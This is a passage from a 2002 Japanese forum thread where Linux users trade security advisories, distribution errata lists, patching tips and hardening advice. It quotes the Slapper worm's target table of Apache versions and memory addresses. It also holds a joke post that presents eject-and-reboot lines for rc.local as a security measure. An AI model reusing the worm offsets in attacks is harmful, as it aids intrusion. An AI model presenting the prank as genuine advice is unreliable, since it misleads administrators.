Jul 28 04:45:35 giko sshd[80120]: warning: /etc/hosts.allow, line 4: can't verify hostname: getaddrinfo(h64-141-4-23.bigpipeinc.com, AF_INET) failed
Jul 28 04:45:35 giko sshd[80120]: refused connect from 64.141.4.23 (64.141.4.23)

% host 64.141.4.23
23.4.141.64.in-addr.arpa domain name pointer h64-141-4-23.bigpipeinc.com.
% host h64-141-4-23.bigpipeinc.com
Host h64-141-4-23.bigpipeinc.com not found: 3(NXDOMAIN)

詳しく調べたわけでないから嘘かもしれぬ。スマソ。

126 :login:Penguin:02/07/29 18:09 ID:qwCj4iNe.net
>>124
攻撃そのものは単純にsshdの古いバージョンでのセキュリティホール
を狙った物だと思う。偶然にもIPから逆引きできたホスト名と、その
ホスト名に対応するIPが合致していなかったために拒否されただけ。


127 :login:Penguin:02/07/30 23:43 ID:OrlpKdAp.net
マタキタ━━━━━━(゚∀゚)━━━━━━ !!!
OpenSSL にリモートから悪用可能なバッファオーバフロー。
既に赤帽と Woody には修正出た。でも Potato はまだ。
util-linux にもちっこい穴。

128 :login:Penguin:02/07/31 11:36 ID:RHIhvYC4.net
CERTキタ━━━(゚∀゚)━( ゚∀)━( ゚)━( )━( )━(゚ )━(∀゚ )━(゚∀゚)━━━!!!!!
http://www.cert.org/advisories/CA-2002-23.html

129 :login:Penguin:02/07/31 13:00 ID:4XI2cpUc.net
Vine Linux 2.5/2.1.5 向け修正キタ━━(゚∀゚)━━━!!!!!
・2002,07,31 openssl にセキュリティホール


130 :login:Penguin:02/07/31 14:06 ID:ihwnQ9C/.net
07/31 Vine-errata security hole

openssl-0.9.6b-1vl5.i386.rpm
openssl-devel-0.9.6b-1vl5.i386.rpm
openssl-perl-0.9.6b-1vl5.i386.rpm

131 :login:Penguin:02/07/31 20:42 ID:YlVAcS0a.net
Turboにglibc、imap、artsのパッチ出てます。

132 :login:Penguin:02/07/31 22:04 ID:VJrOgCEJ.net
openss-0.9.6eをmake installしたら
/usr/bin/pod2manがうまくいかね−とか言って
「自前の古いやつで代用しとくよん」とか言われるんだが
perlはperl-5.00503-12が入っている
/usr/bin/pod2manは
29017 Aug 11 2000 /usr/bin/pod2man
赤帽6.2, kernel2.2.19-6.2.16
なんで?

133 :login:Penguin:02/07/31 22:23 ID:Q67jwc8B.net
>>131
imap のってかなり前から判明してて悪用ツールも出回ってるのに、
赤帽は無視状態なんだよなぁ。

134 :login:Penguin:02/08/01 00:00 ID:HYtIqah4.net
>>132
鷲もSolaris8(SPARC版)で同じようなエラーでまくった。

135 :login:Penguin:02/08/01 04:58 ID:K+qKORMj.net
>>132
FreeBSD 4.6-STABLEで同じエラーが出たが,
PlamoLinux 2.2.6では出なかった

136 :135:02/08/01 05:03 ID:K+qKORMj.net
ちなみに
FreeBSD:
-r-xr-xr-x 1 root wheel 29017 Sep 26 2000 /usr/bin/pod2man
Linux:
-rwxr-xr-x 1 root root 28830 Jul 23 1999 /usr/bin/pod2man*


137 :OpenSSHにトロイ:02/08/02 00:12 ID:INRnoZ0d.net
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

138 :132:02/08/02 11:13 ID:ODee0oiA.net
ヨー分からんが、どうせマニュアルだしとおもって
とりあえず無視して続行した
情報あんがと>>134, 135

139 :login:Penguin:02/08/02 11:37 ID:Ybd6oZe9.net
>137
祭りのヨカーン
うちは大丈夫だったーよ。

140 :名無しさん@Emacs:02/08/02 12:53 ID:00MO2/Lt.net
>>137
祭りネタキタ━━━━━━(゚∀゚)━━━━━━ !!!!!
いや、うちは全く問題なかったんだけど。

いちおうcertのほうのリンクも。
http://www.cert.org/advisories/CA-2002-24.html


141 :login:Penguin:02/08/02 13:02 ID:1fOWog9y.net
因紫 掻
薄仙 尻衣馬形壱 馬澗 紫戚闘拭 奄沙 凪戚走亜 蒸柔艦陥. 穣益傾戚球馬澗 掻析 呪 赤柔艦陥.


陥製拭 陥獣 背左淑獣神. 庚薦亜 域紗鞠檎 瀬 紫戚闘 淫軒切拭惟 庚税馬淑獣神.

これってなんて書いてあるの?ルータのログみたら外からローカルの
アドレス参照しようとしてたみたいなんだけど。


142 :141:02/08/02 13:03 ID:1fOWog9y.net
参照元のURL見に行ったら書いてあった。

143 :login:Penguin:02/08/02 20:01 ID:8Z+yUGrL.net
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
sunrpc にリモートな穴
http://www.isskk.co.jp/support/techinfo/general/SunRPC_xforce.html

glibcおそらくダメ。パッチ前のコードとおんなじ。

144 :login:Penguin:02/08/02 20:07 ID:8Z+yUGrL.net
cvsは変更されている。

145 :login:Penguin:02/08/02 20:42 ID:Fjm5fo+C.net
>>143
俺的にはネットに sunrpc を露出させてる事自体が非常識だと思うが、
実際にはそういう鯖がいっぱいあるんだろうな。
Debian ですらデフォルトで sunrpc が動いてる。

146 :login:Penguin:02/08/03 22:31 ID:iNHan/6D.net
>>145
libwrap組み込みのportmapperはまだマシ。
Solarisのやつはアクセス制限ないからね


147 :login:Penguin:02/08/03 22:43 ID:iYyATlBv.net
>>145
ルータで塞いでるから、ネットに晒してるのはあまり無い気がするが、
それでも内部からだと叩かれまくるよな。

148 :login:Penguin:02/08/03 23:03 ID:q+uK3qOu.net
ガーソ。NFS鯖もだめっぽ?


149 :login:Penguin:02/08/04 02:40 ID:mTLJthdl.net
Port111、iptablesでrejectしとこっと

150 :login:Penguin:02/08/08 08:04 ID:GKTZUhh4.net
08/07 Vine-errata security hole

apache-1.3.26-0vl3.i386.rpm
apache-devel-1.3.26-0vl3.i386.rpm
apache-manual-1.3.26-0vl3.i386.rpm
mod_ssl-2.8.7-0vl3.i386.rpm

151 :login:Penguin:02/08/08 08:06 ID:GKTZUhh4.net
08/07 Vine-errata security hole

libpng-1.0.12-0vl3.i386.rpm
libpng-devel-1.0.12-0vl3.i386.rpm

152 :OpenSSL0.9.6f:02/08/09 14:31 ID:BghTOrfj.net
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
http://www.openssl.org/

153 :あぼーん:あぼーん.net
あぼーん

154 :login:Penguin:02/08/09 14:59 ID:4tlTdlJW.net
>>152
またopensslに依存するのをビルドしなおしかよ・・メンドクセー


155 :OpenSSL0.9.6f:02/08/09 15:10 ID:BghTOrfj.net
>>154
朝からWin2kのSP3(板違いスマソ)もいれたし、
次はコレかよって感じだよ....ウワヮヮン ヽ(`Д´)ノ

156 :名無しさん@XEmacs:02/08/09 15:19 ID:QtBVDpro.net
あうん。 OpenSSL は、ちと面倒だよね。。。


157 :login:Penguin:02/08/09 15:21 ID:8WrLJci1.net
make installでコケるぞ。0.9.6g出んのかな
http://marc.theaimsgroup.com/?l=openssl-cvs&m=102849375109205&w=2

158 : :02/08/09 19:13 ID:o+8My8IY.net
カンプールのインド工科大学のManindra Agrawal、Neeraj KayalおよびNitin Saxenaが、
素数判定を多項式時間(polynomial time)で可能なアルゴリズムを発見、証明した。

素数判定(が困難であること)は、RSAをはじめとする多くのコンピュータ暗号が安全である
ことを保障しているため、もしこれが事実であった場合、コンピュータ暗号の世界に多大な
影響を及ぼすと予想される。

論文は以下のURLからたどることができる。

また、ニューヨークタイムズの記事によると、ベル研のDr. Carl Pomerance博士は
この論文を正確(correct)であると断定し、「このアルゴリズムは美しい。」
("This algorithm is beautiful.")とコメントしたという。

論文のURL(英語: 数学者の写真あり): http://www.cse.iitk.ac.in/news/primality.html
NY Timesの記事(英語): http://www.nytimes.com/2002/08/08/science/08MATH.html

関連スレ
【科学】素数判定が多項式時間で可能、コンピュータ暗号に影響大―インドの数学者証明
http://news2.2ch.net/test/read.cgi/newsplus/1028876818/
素数判定は「決定的」多項式時間で可能
http://science.2ch.net/test/read.cgi/math/1028813059/

もうだめぽ、、

159 :login:Penguin:02/08/09 19:23 ID:8xcqN05M.net
地味なタコ式祭りが発生しているが... 当面 RSA には影響なさげ。

160 :login:Penguin:02/08/09 19:27 ID:8xcqN05M.net
>素数判定(が困難であること)は、RSAをはじめとする...
RSA の基盤は「素因数分解(が困難であること)」だバカモノ。

161 :login:Penguin:02/08/09 19:44 ID:o+8My8IY.net
>>160
素数判定は楽にできるようになったけど、
依然として素因数分解は困難であるということ?


162 :login:Penguin:02/08/09 19:49 ID:8xcqN05M.net
>>161
アルゴリズムを素因数分解に応用できるかどうかは今の所未知数。
ていうか今のところ関係無し。でも数学好きにはたまらんネタだろうな。

163 :login:Penguin:02/08/09 21:03 ID:o+8My8IY.net
>>162
ども。
とりあえず、あわてることはなさそうですね。


164 :login:Penguin:02/08/10 08:00 ID:nkdobe6F.net
こういう時数学的素養がない漏れはツライ...


165 :login:Penguin:02/08/11 00:52 ID:Bp+ly3tB.net
8月中に色々出そうなヨカーン


166 :login:Penguin:02/08/11 05:59 ID:cqQ7h8Qr.net
opensslは0.9.6gか・・・
この手のライブラリは頻繁にバージョンアップされたら泣けてくる・・・

今、0.9.6e使ってるんだけど、セキュリティ問題あんのかな?
うちではbuildは素直に通ったんだけど・・・これ絡みの修正なら放置したい・・・

167 :login:Penguin:02/08/11 08:43 ID:uKejT2NS.net
>>166
openssl 0.9.6eはバグ入りです。これあてないと駄目。なんで0.9.6fとか openssl advisoryが出ないのか不思議です。
http://marc.theaimsgroup.com/?l=openssl-cvs&m=102831422608153&w=2

セキュリティーホールmemoから引用

168 :166:02/08/11 15:42 ID:cqQ7h8Qr.net
>>167
THX
アップデートしておいた方がよさげかな(泣

169 :login:Penguin:02/08/12 10:36 ID:/vXwCwY1.net
これって 6.2 も BIND 9.x に上げろ、ってこと?
http://rhn.redhat.com/errata/RHSA-2002-133.html

170 :login:Penguin:02/08/12 11:41 ID:9+/01gLs.net
もう、openssl0.9.6gでてるよ。
opensshとかapacheとか、makeしなおしかよー

171 :login:Penguin:02/08/12 14:32 ID:CpjzB4Ow.net
>>170
スタティックリンクしてるのか?


172 :login:Penguin:02/08/12 15:28 ID:9+/01gLs.net
sharedでmakeしてるときって、再起動だけでいいんですか?
ldd /usr/sbin/sshd
してみたら、
libcrypto.so.3 => /usr/lib/libcrypto.so.3 (0x280d0000)
という風になってて、
このlibcrypto.so.3 は古いライブラリだったんですよね。
新しいのは
libcrypto.so.2
なんですけど・・・・

173 :login:Penguin:02/08/12 16:38 ID:e6gR74Zh.net
海胆板とクロスポストかよ おめでてえな

174 :login:Penguin:02/08/13 22:00 ID:Lm+jD2sp.net
>>171
お前馬鹿だなぁ。ダイナミックリンクでも新しいバージョン入れて再起動しないとダメだよ。

175 :login:Penguin:02/08/13 23:10 ID:OgpeoNS6.net
>>172
入れ換えて再起動するだけでいい。そのためのシェアードライブラリ。
そのへんがよく判ってない人は RPM に頼るほうが安全だよ。

176 :login:Penguin:02/08/13 23:49 ID:HzHkL5P0.net
rpm だと, シェアードライブラリを入れ変えると, link してる
daemon を再起動してくれるもんなの? なんかすごそう.





177 :login:Penguin:02/08/13 23:53 ID:42AXx8EM.net
>>176
してくれないんでない?
OpenSSL の Advisory では「リブートしろ」って書いてある。
http://rhn.redhat.com/errata/RHSA-2002-160.html

178 :login:Penguin:02/08/14 00:33 ID:zJGAdpS8.net
>>176 いや、そこまではやってくれないよ。
シェアードにしたつもりで出来てなかった、とかの失敗が無くなるだけ。
それに >>177 が書いてるように、アドバイザリに必要な作業が載る。
でも Debian で glibc 入れ換えると片っ端から再起動してくれて驚く。


179 :login:Penguin:02/08/14 07:06 ID:s4Wd/65X.net
>178
/sbin/init も?

180 :login:Penguin:02/08/14 11:21 ID:xh4yp2uP.net
>>179 Debian で /sbin/init を再起動してくれるかどうかは確かめてない。
でも赤帽でも init は再起動してくれるくらいだから、やってるんじゃない?

181 :login:Penguin:02/08/18 01:02 ID:dpWasehA.net
>>179
postinst で init u してるのを発見



182 :login:Penguin:02/08/25 02:51 ID:u07j5rfK.net
08/15 Vine-errata security hole

mozilla-1.0.0-9vl9.i386.rpm
mozilla-chat-1.0.0-9vl9.i386.rpm
mozilla-devel-1.0.0-9vl9.i386.rpm
mozilla-dom-inspector-1.0.0-9vl9.i386.rpm
mozilla-js-debugger-1.0.0-9vl9.i386.rpm
mozilla-mail-1.0.0-9vl9.i386.rpm
mozilla-nspr-1.0.0-9vl9.i386.rpm
mozilla-nspr-devel-1.0.0-9vl9.i386.rpm
mozilla-nss-1.0.0-9vl9.i386.rpm
mozilla-nss-devel-1.0.0-9vl9.i386.rpm
mozilla-psm-1.0.0-9vl9.i386.rpm

183 :login:Penguin:02/08/25 02:51 ID:u07j5rfK.net
08/25 Vine-errata security hole

util-linux-2.11n-4vl6.i386.rpm
mount-2.11n-4vl6.i386.rpm
losetup-2.11n-4vl6.i386.rpm

184 :login:Penguin:02/08/26 23:12 ID:8KXm86HS.net
>>181
なるほど。
Red Hat だと glibc に付属の glibc_post_upgrade を実行してたよ。

185 :login:Penguin:02/08/29 11:09 ID:9F1pybQo.net
古いので sage

http://service.real.com/help/faq/security/bufferoverrun.html
http://service.real.com/help/faq/security/clipsource.html

186 :login:Penguin:02/09/14 13:13 ID:B9dlUKMe.net
Linux.Slapper.Worm
http://slashdot.jp/article.pl?sid=02/09/14/033203&mode=thread

187 :4も学割野朗 ◆4GET/.F. :02/09/14 23:20 ID:jwopavyL.net
http://www.zakzak.co.jp/top/top0914_3_26.html

俺にとっては他人事じゃなかったりするわけだが。

188 :4も学割野朗 ◆4GET/.F. :02/09/14 23:22 ID:jwopavyL.net
間違えた。こっちが正しい。
http://www.zakzak.co.jp/top/t-2002_09/3t2002091403.html
知らない間にNASAにハッキング…
愛知の会社員になりすまして攻撃

愛知県知立市の会社員(31)が自宅で所有するパソコンが8月、ケーブルテレビ局のインターネット回線を経由して
何者かに勝手に遠隔操作され、米航空宇宙局(NASA)の施設「ジェット推進研究所」のコンピューターにハッカー攻撃をしていたことが14日までに分かった。


189 :login:Penguin:02/09/14 23:24 ID:xbXyt3h1.net
これって、UNIX系OS入れてたってことなのかな?
それとも、Win2000?

190 :4も学割野朗 ◆4GET/.F. :02/09/14 23:26 ID:jwopavyL.net
>>189 ウィンやマックじゃないって書いてあるからUNIX系だと思われ。

191 :login:Penguin:02/09/14 23:35 ID:xbXyt3h1.net
>>190
さんくす。
朝日の記事しか読んでなかった。zakuzakuには書いてあったんだね。

192 :login:Penguin:02/09/15 00:03 ID:s5g/JVKr.net
おまえらはそもそも軽く考えてサーバ建てすぎ。
まぁこのスレに来る連中はまだいいほうだな。
少なくとも「セキュリティ」という単語を知ってる。

193 :login:Penguin:02/09/15 00:10 ID:/sdc7+j+.net
>>192

鯖は建てましたがワールドワイドには繋いでません。

194 :CRYPTO-GRAM, September 15:02/09/16 17:43 ID:qCuGZIi/.net
AES may have been broken. Serpent, too.

195 :login:Penguin:02/09/17 10:46 ID:FczQ6EGn.net
Linuxサーバを襲う新手のワーム
http://www.zdnet.co.jp/news/0209/17/nebt_05.html


196 :login:Penguin:02/09/17 11:07 ID:f9VI4nxX.net
>>195
それがまるっきり来ないんだよ。TCP 443 を叩いてもくれない。
既に絶滅したかも。来るのは MS SQL のワームばかり。

197 :login:Penguin:02/09/17 11:32 ID:FczQ6EGn.net
だよな。普通にアップデートしていたら穴は塞がってるし。
漏れもくだ質のヤツしか見た事無い。
http://pc.2ch.net/test/read.cgi/linux/1031670376/386

198 :login:Penguin:02/09/17 13:18 ID:e3Zfg2Kx.net
最近、https 公開していないサーバに 2 回ほど
443/tcp アクセスがあったよ。まだ Worm は知ら
なかったから(゜Д゜)ハァ? と思ったけど。

9/13 17:05:20 と 9/14 19:17:00 に 1 回ずつ
SYN が来てた。

1433/tcp に埋もれて見落しそうになる(w

199 :from bugtraq.c:02/09/17 14:42 ID:f9VI4nxX.net
オリジナルの Slapper のターゲット。
struct archs {
char *os;
char *apache;
int func_addr;
} architectures[] = {
{"Gentoo", "", 0x08086c34},
{"Debian", "1.3.26", 0x080863cc},
{"Red-Hat", "1.3.6", 0x080707ec},
{"Red-Hat", "1.3.9", 0x0808ccc4},
{"Red-Hat", "1.3.12", 0x0808f614},
{"Red-Hat", "1.3.12", 0x0809251c},
{"Red-Hat", "1.3.19", 0x0809af8c},
{"Red-Hat", "1.3.20", 0x080994d4},
{"Red-Hat", "1.3.26", 0x08161c14},
{"Red-Hat", "1.3.23", 0x0808528c},
{"Red-Hat", "1.3.22", 0x0808400c},
{"SuSE", "1.3.12", 0x0809f54c},
{"SuSE", "1.3.17", 0x08099984},
{"SuSE", "1.3.19", 0x08099ec8},
{"SuSE", "1.3.20", 0x08099da8},
{"SuSE", "1.3.23", 0x08086168},
{"SuSE", "1.3.23", 0x080861c8},
{"Mandrake", "1.3.14", 0x0809d6c4},
{"Mandrake", "1.3.19", 0x0809ea98},
{"Mandrake", "1.3.20", 0x0809e97c},
{"Mandrake", "1.3.23", 0x08086580},
{"Slackware", "1.3.26", 0x083d37fc},
{"Slackware", "1.3.26",0x080b2100}
};


200 :login:Penguin:02/09/17 16:23 ID:Noq0z9Is.net
>>198
9/14が最初で毎日2〜3回づつ来てるよ。


201 :login:Penguin:02/09/17 16:34 ID:f9VI4nxX.net
>>200
アドレスのスキャン方法によって来る IP と来ない IP があるのかな?

202 :login:Penguin:02/09/18 19:16 ID:V7u05Yz6.net
>>201
まず 80 番にアクセスして対象となる Apache を探す。
だから 443 にはアクセスが無い事もある。
GET / HTTP/1.1 してすぐに逃げてく奴が妖しい。
基本的にこないだの Apache のワームの改造版らしいね。

203 :  :02/09/22 02:03 ID:0Va9RvOb.net
RSAよりも強固な楕円暗号のフリーソースがたしかサンから放出される
という噂を聞いたが、それは取り込まれるのかな?

204 :login:Penguin:02/09/22 02:37 ID:fw5votXq.net
>>203
Linuxに取り込むことは無いだろうが、OpenSSLにはすでに提供済みとのこと。
じきにOpenSSHやGPGなどに取り込まれるじゃないかな?

205 :名無しさん@Meadow:02/09/22 02:59 ID:v9Q7KCox.net
これね。
http://japan.cnet.com/Enterprise/News/2002/Item/020920-3.html
OpenSSLで使われるならBSDライセンスになるでしょ。
なら、GPLで汚染することも可能(藁。

206 :login:Penguin:02/09/22 03:01 ID:3+1dfxia.net
>>199
じゃ、ここらへん偽っとくと、昆虫採集できるの?

207 :login:Penguin:02/09/22 03:09 ID:lAUJfl5L.net
RedHat7.3を使ってWEBサーバにしています。

セキュリティ対策として
・毎日一回up2date実行
・IPTABLES
・snort
・tripwire
をしています。
ほかに導入すべきソフトや対策あったら教えていただけますでしょうか。

208 :login:Penguin:02/09/22 15:30 ID:ZMoD+eSk.net
>>207
ログの監視は必須。これは一番最初にやるべき事だ。
必要ないプログラムを止め、削除する。不用な Apache のモジュールも。
確実に信用できる奴以外はログインさせない、アカウントを作らない。
サーバへのログイン、管理は SSH や SSL 等、盗聴に強いものを使う。
あとはサーバ自身より中味の問題。
CGI 等の Web アプリケーションに注意すべきだ。非常に穴が多い。
どこからか拾って来た CGI スクリプトは決してインストールしない。
クロスサイトスクリプティング脆弱性についても注意が必要だ。
こんなもんだろ。
もっとやりたいパラノイア君には、他にも出来る事が沢山ある。
ピアソンの「Linux セキュリティトータルガイド」一読を薦める。

209 :login:Penguin:02/09/22 15:49 ID:ZMoD+eSk.net
>>206 絶滅危惧種だから天然ものは簡単には捕まらないぞ。

210 :login:Penguin:02/09/22 17:24 ID:oJW7ac5g.net
>>209
なんだ、養殖モノしか捕まらないのか...
(´・ω・)ショボーン


211 :login:Penguin:02/09/26 16:12 ID:Q23MY6o0.net
最新版であるxfree86 4.2.1までのバージョンで
libX11.soライブラリの脆弱性によってローカルユーザーに任意のプログラムを実行される可能性がある
http://www.xfree86.org/security/

212 :login:Penguin:02/09/26 16:18 ID:pqbC9pgT.net
>>211
それって suid root の X クライアントが無いと悪用不可能な気がする。

213 :login:Penguin:02/09/27 01:41 ID:lhdC2Dp9.net
>>212
xtermはしっかりsuid root。

214 :login:Penguin:02/10/03 01:04 ID:OsvGBspG.net
10/03 Vine-errata security hole

postgresql-7.2.2-0vl3.i386.rpm
postgresql-contrib-7.2.2-0vl3.i386.rpm
postgresql-devel-7.2.2-0vl3.i386.rpm
postgresql-docs-7.2.2-0vl3.i386.rpm
postgresql-jdbc-7.2.2-0vl3.i386.rpm
postgresql-libs-7.2.2-0vl3.i386.rpm
postgresql-odbc-7.2.2-0vl3.i386.rpm
postgresql-perl-7.2.2-0vl3.i386.rpm
postgresql-python-7.2.2-0vl3.i386.rpm
postgresql-server-7.2.2-0vl3.i386.rpm
postgresql-tcl-7.2.2-0vl3.i386.rpm
postgresql-tk-7.2.2-0vl3.i386.rpm

215 :login:Penguin:02/10/03 01:05 ID:OsvGBspG.net
10/03 Vine-errata security hole

namazu-2.0.12-0vl1.i386.rpm
namazu-devel-2.0.12-0vl1.i386.rpm

216 :login:Penguin:02/10/03 01:05 ID:OsvGBspG.net
10/03 Vine-errata security hole

XFree86-4.2.1-0vl4.i386.rpm
XFree86-100dpi-fonts-4.2.1-0vl4.i386.rpm
XFree86-75dpi-fonts-4.2.1-0vl4.i386.rpm
XFree86-Xnest-4.2.1-0vl4.i386.rpm
XFree86-Xvfb-4.2.1-0vl4.i386.rpm
XFree86-cyrillic-fonts-4.2.1-0vl4.i386.rpm
XFree86-devel-4.2.1-0vl4.i386.rpm
XFree86-doc-4.2.1-0vl4.i386.rpm
XFree86-gl-4.2.1-0vl4.i386.rpm
XFree86-gl-devel-4.2.1-0vl4.i386.rpm
XFree86-legacy-4.2.1-0vl4.i386.rpm
XFree86-libs-4.2.1-0vl4.i386.rpm
XFree86-tools-4.2.1-0vl4.i386.rpm
XFree86-twm-4.2.1-0vl4.i386.rpm
XFree86-xdm-4.2.1-0vl4.i386.rpm
XFree86-xf86cfg-4.2.1-0vl4.i386.rpm
XFree86-xfs-4.2.1-0vl4.i386.rpm

217 :login:Penguin:02/10/03 01:05 ID:OsvGBspG.net
10/03 Vine-errata security hole

python-1.5.2-28vl4.i386.rpm
python-devel-1.5.2-28vl4.i386.rpm
python-docs-1.5.2-28vl4.i386.rpm
python-tools-1.5.2-28vl4.i386.rpm
tkinter-1.5.2-28vl4.i386.rpm

218 :login:Penguin:02/10/03 01:06 ID:OsvGBspG.net
10/03 Vine-errata security hole

xchat-1.8.10-0vl1.i386.rpm


219 :login:Penguin:02/10/03 01:12 ID:T2cHE8PV.net
>>213
それは古い常識。

220 :login:Penguin:02/10/06 15:38 ID:kqhyD1Co.net
数日前にでた Red Hat の glibc アップデート
http://rhn.redhat.com/errata/RHSA-2002-197.html
を当てると、MySQL が死ぬ事があるらしいぞ。
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=75128


221 :login:Penguin:02/10/09 16:59 ID:GCLBywcm.net
Sendmailにトロイが仕込まれてたそうな。
http://www.cert.org/advisories/CA-2002-28.html


222 :login:Penguin:02/10/12 22:59 ID:AS/1mqsd.net
mainte

223 :login:Penguin:02/10/14 13:03 ID:Yr4D9drm.net
セキュリティを強化するために以下の行を
/etc/rc.d/rc.localに追加してください
eject
eject -t
eject
eject -t
eject
eject -t
eject
echo "ご苦労"
reboot

224 :openssh3.5age:02/10/15 03:19 ID:OdSSQrkP.net
しかし、こうトロイが続くと心配になるな・・・
make前にソース読むしかないのか?

225 :login:Penguin:02/10/19 11:04 ID:8jgklp6v.net
お前ら、アンチウイルスソフトでSophos以外で
個人利用が無料のものはありますか。

226 :login:Penguin:02/10/21 11:00 ID:geoyITgp.net
あるよ。

227 :login:Penguin:02/10/22 23:32 ID:v1mpEmk/.net
>>225
うんこしないよ

228 :login:Penguin:02/10/23 13:33 ID:9clkFO2S.net
10/23 Vine-errata security hole

webmin-1.000-1vl3.noarch.rpm

229 :login:Penguin:02/10/23 15:35 ID:W0Y2GjXD.net
>皆様、セキュリティホールは埋めとけよ

ってことは>>1生き埋めですか・・・?

230 :login:Penguin:02/10/23 16:13 ID:ZfPnlnd+.net
>>229
ごめん、どういう意味?

231 :login:Penguin:02/10/27 19:03 ID:DEU6FCX+.net
10/27 Vine-errata security hole

webmin-1.000-1vl5.noarch.rpm

232 :login:Penguin:02/10/27 19:06 ID:oH46f0cH.net
「彼女のセキュリティホールがゆるい」が
埋められてしまったのを思い出したよ。。。

233 :login:Penguin:02/10/31 19:53 ID:tNyCeh9o.net
10/31 Vine-errata security hole

mozilla-1.1-0vl6.i386.rpm
mozilla-chat-1.1-0vl6.i386.rpm
mozilla-devel-1.1-0vl6.i386.rpm
mozilla-dom-inspector-1.1-0vl6.i386.rpm
mozilla-js-debugger-1.1-0vl6.i386.rpm
mozilla-mail-1.1-0vl6.i386.rpm
mozilla-nspr-1.1-0vl6.i386.rpm
mozilla-nspr-devel-1.1-0vl6.i386.rpm
mozilla-nss-1.1-0vl6.i386.rpm
mozilla-nss-devel-1.1-0vl6.i386.rpm
mozilla-psm-1.1-0vl6.i386.rpm


234 :login:Penguin:02/11/01 10:17 ID:oNzk19D1.net
11/1 Vine-errata security hole

2.5/{i386,ppc,alpha}
unzip-5.50-4vl1.i386.rpm
unzip-5.50-4vl1.ppc.rpm
unzip-5.50-4vl1.alpha.rpm

2.5/{i386,ppc,alpha} 2.6/{i386,ppc,alpha}
tar-1.13.25-8vl3.i386.rpm
tar-1.13.25-8vl3.ppc.rpm
tar-1.13.25-8vl3.alpha.rpm

235 :login:Penguin:02/11/11 22:18 ID:lWjYmx1J.net
またglibc入れ替えでつか・・
http://www.kb.cert.org/vuls/id/IAFY-5FKJ33


236 :login:Penguin:02/11/12 19:35 ID:IbLfzr3s.net
Vine Linux 2.5/2.6 向け
・2002,11,12 XFree86 のメモリリーク修正、ドライバ更新 [2.6/{i386,ppc}]
・2002,11,12 kernel のバグ修正 [2.6/{i386}]
・2002,11,12 apache, mod_ssl にセキュリティホール [2.5/{i386,ppc,alpha} 2.6/{i386,ppc,alpha}]
・2002,11,12 openssl にセキュリティホール [2.5/{i386,ppc,alpha}]
・2002,11,12 gv にセキュリティホール [2.5/{i386,ppc} 2.6/{i386,ppc}]


237 :login:Penguin:02/11/14 11:04 ID:hDcsnf62.net
11/14 Vine-errata security hole

WindowMaker-0.80.2-0vl1.i386.rpm
WindowMaker-libs-0.80.2-0vl1.i386.rpm
WindowMaker-devel-0.80.2-0vl1.i386.rpm

(´・ω・`)ショボーン

238 :login:Penguin:02/11/14 15:43 ID:h0BBp4h4.net
bind のパッチリリース age


239 :login:Penguin:02/11/14 17:24 ID:1qJgRtJZ.net
http://online.securityfocus.com/archive/1/299704/2002-11-10/2002-11-16/0
よりによって libpcap に仕込むとはねぇ...(((;゚Д゚))ガクガクブルブル

240 :login:Penguin:02/11/14 20:45 ID:M1eCryy5.net
11/14 Vine-errata security hole

glibc-2.2.4-14vl12.i386.rpm
glibc-common-2.2.4-14vl12.i386.rpm
glibc-devel-2.2.4-14vl12.i386.rpm
glibc-profile-2.2.4-14vl12.i386.rpm
nscd-2.2.4-14vl12.i386.rpm

caching-nameserver-7.1-3vl3.noarch.rpm


241 :login:Penguin:02/11/15 06:01 ID:jZlgoDm5.net
11/15 Vine-errata security hole

bind-8.3.1-0vl2.i386.rpm
bind-devel-8.3.1-0vl2.i386.rpm
bind-utils-8.3.1-0vl2.i386.rpm


242 :login:Penguin:02/11/20 01:55 ID:GUhnBobE.net
ttp://www.zdnet.co.jp/enterprise/0211/19/n29.html
> インターネット・セキュリティ・システムズ(ISS)の勧告とは裏腹に、さ
>まざまな「アンダーグラウンド」グループが、少なくとも8月の時点でこの脆
>弱性を認識していた。筆者が初めてそれを知ったのも、最初の侵入が話題に
>なった8月のことである。

マ ジ で す か ?

243 :login:Penguin:02/11/20 04:56 ID:9HGeMWU7.net
>>1-242
OpenBSD 3.2-Stable版をインストールする事で一件落着!!!


--------------------キリトリセン--------------------

244 :login:Penguin:02/11/20 05:21 ID:Qb2RCDyv.net
>>243
OpenBSD のデフォルトの設定がいくら堅くても、その後の
設定をミスれば、簡単にセキュリティを弱くできるので、盲信じゃ、
やめた方がいいじゃろう。

少なくとも、他のディストリとか BSD や Solaris などの穴は、
見ておくべき。

245 :login:Penguin:02/11/20 05:44 ID:9HGeMWU7.net
>盲信じゃ、やめた方がいいじゃろう。
「盲者じゃ」という前置きが無ければね。
まあ、設定ミスるアホは使うなという事だな。
ミスりたくなければ、Win2kでも使ってりゃ良いだろ。

246 :login:Penguin:02/11/20 08:54 ID:C2HbeHa3.net
( ´_ゝ`)フーン

247 :login:Penguin:02/11/21 18:21 ID:4zefnMwe.net
D J B を 使 え


248 :login:Penguin:02/11/23 19:27 ID:5gG5Oc4E.net

11/23 Vine-errata security hole

kernel-2.4.19-0vl26.i386.rpm
kernel-2.4.19-0vl26.i586.rpm
kernel-2.4.19-0vl26.i686.rpm
kernel-BOOT-2.4.19-0vl26.i386.rpm
kernel-doc-2.4.19-0vl26.i386.rpm
kernel-headers-2.4.19-0vl26.i386.rpm
kernel-smp-2.4.19-0vl26.i386.rpm
kernel-smp-2.4.19-0vl26.i586.rpm
kernel-smp-2.4.19-0vl26.i686.rpm
kernel-source-2.4.19-0vl26.i386.rpm


249 :login:Penguin:02/11/26 10:06 ID:ntT13pIS.net
New kernel 2.2 packages fix local denial of service issue

http://rhn.redhat.com/errata/RHSA-2002-264.html
> The kernel in Red Hat Linux 6.2 and 7 is vulnerable to
> a local denial of service attack.

250 :login:Penguin:02/11/28 01:35 ID:fshFu6y3.net
11/27 Vine-errata security hole

w3m-0.3.2.1-0vl0.26.i386.rpm

251 :login:Penguin:02/11/30 11:04 ID:VjhBJ/BI.net
「もっともセキュリティが弱いOSはLinux,Aberdeen Groupがレポート」
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20021127/1/


252 :login:Penguin:02/12/02 10:37 ID:oTqt5iDH.net
Canna3.6p1 キタ━━━━(゚∀゚)━━━━ッ!!

> Canna 3.6p1をリリースしました(2002/12/02)。
> これはセキュリティ修正のみを行ったリリースです。


